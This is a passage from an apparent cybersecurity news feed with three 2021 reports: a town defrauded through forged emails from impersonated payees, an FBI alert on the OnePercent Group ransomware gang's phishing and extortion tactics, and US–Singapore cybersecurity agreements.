First the criminals used forged documents and compromised email accounts to pose as staff at the local school district. This enabled them to divert a million-dollar transfer made to the district by the town into a bank account under their control. 

The theft came to light on July 26 when the ConVal School District notified the town that it had missed a $1.2m monthly payment.

On August 18 it emerged that cyber-thieves had stolen more money by posing as general contractor Beck and Bellucci, hired by the town to repair Main Street Bridge.

Town administrator Nicole MacStay and select board chair Tyler Ward said it was not yet clear whether any of the town's losses would be covered by their insurance policy.

In a phone interview on Tuesday, MacStay said: “It’s very shocking to us to be quite honest. It’s just been very difficult to work through all this, and try to do the best we can to recover these funds ... to mitigate the burden on our residents and taxpayers."

An investigation into the thefts has been launched by the United States Secret Service. While the investigation is carried out, the town's finance department staff have been placed on leave.

A press release issued by Ward and MacStay suggests that finance department staff were unwitting pawns in the thefts, which have been attributed to threat actors that appear to be based outside of the United States.

“Investigations into these forged email exchanges show that they originated overseas,” stated the release.

“These criminals were very sophisticated and took advantage of the transparent nature of public sector work to identify the most valuable transactions and focus their actions on diverting those transfers.” 

The town is reviewing its procedures regarding electronic financial transfers and has canceled all automated clearing house transfers.

Categories: Cyber Risk News

FBI Issues Ransomware Group Flash Alert

Info Security - Tue, 08/24/2021 - 19:12
FBI Issues Ransomware Group Flash Alert

The Federal Bureau of Investigation's Cyber Division has issued a flash warning over an organized cyber-criminal gang calling itself OnePercent Group. 

In a TLP: WHITE alert published Monday, the FBI said the group has been targeting companies in the United States since November 2020. 

OnePercent's modus operandi is to use the threat emulation software Cobalt Strike to perpetuate ransomware attacks. The infection process begins in the victim's inbox.

"OnePercent Group actors compromised victims through a phishing email in which an attachment is opened by the user," states the FBI warning. "The attachment's macros infect the system with the IcedID banking trojan."

The malicious attachment appears as a zip file containing a Microsoft Word or Excel document. Once activated, the banking trojan downloads extra software onto the victim's computer, including Cobalt Strike, which the FBI said "moves laterally in the network, primarily with PowerShell removing."

After accessing a victim's computer, OnePercent encrypts their data and exfiltrates it from the network using rclone. A virtual ransom note is left that tells the victim they have one week from the date of infection to make contact with the ransomware group. 

"OnePercent Group actors’ extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data," warned the FBI.

If no contact is made, the group contacts the victim via a ProtonMail email address or over the phone using spoofed phone numbers. Victims are told that a small portion of their data will be leaked through The Onion Router (TOR) network and clearnet, unless a ransom payment is made. 

Should a victim refuse to pay up after this initial "one percent leak," the ransomware group threatens to sell their data to the ransomware gang Sodinokibi  (REvil) to publish at an auction. 

The FBI said that OnePercent Group threat actors have been spotted entering a victim's network around a month before ransomware is deployed. 

US companies are urged by the FBI to back-up their critical data offline and use multi-factor authentication with strong passphrases to protect themselves from ransomware attacks. 

Categories: Cyber Risk News

US Signs Cybersecurity Agreements with Singapore

Info Security - Tue, 08/24/2021 - 18:03
US Signs Cybersecurity Agreements with Singapore

The United States and Singapore have agreed to cooperate on cybersecurity and climate change issues.

On August 23, Singapore's prime minister, Lee Hsien Loong, announced that three cybersecurity agreements had been signed by the cyber, defense, and finance agencies of both countries. 

The announcement was made during a visit to Singapore by US vice president Kamala Harris. On Monday, Loong and Harris spent 90 minutes together in a meeting that Harris described as "productive."

Speaking at a joint press conference on Tuesday, Harris said: “Today, we are in Singapore to stress and reaffirm our enduring relationship to this country and in this region, and to reinforce a shared vision of a free and open Indo-Pacific region, and to reaffirm our mutual interests in peace and stability in Southeast Asia.”

Loong said that the agreements would deepen collaboration between the two countries on critical technology, data security, the sharing of best practices, and infrastructure defense.

The first agreement is a bilateral Memorandum of Understanding (MOU) between the US Treasury and the Monetary Authority of Singapore that aims to help both financial sectors share information on cyber-threats to financial markets and be more prepared for and resilient to cyber-threats.

A second MOU was signed between the US Defense Department and the Singapore Ministry of Defense. The White House said the agreement "will support broad defense cooperation to advance cybersecurity information sharing, exchange of threat indicators, combined cyber training and exercises, and other forms of military-to-military cooperation on cyber issues."

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber Security Agency of Singapore (CSA) signed the third MOU in a bid to improve the exchange of intelligence on cyber-threats and defensive measures, increase coordination for cyber-incident response, and enable cybersecurity capacity building across Southeast Asia.  

The two countries further agreed to start a new Climate Partnership oriented toward green solutions around goods, services and technology, and carbon credits. 

Harris began a three-day visit to Singapore on August 22 by meeting with Singapore's president, Halimah Yacob. The meeting took place at the Istana, where a new orchid hybrid – the Papilionanda Kamala Harris – had been named in the vice president's honor. 

Categories: Cyber Risk News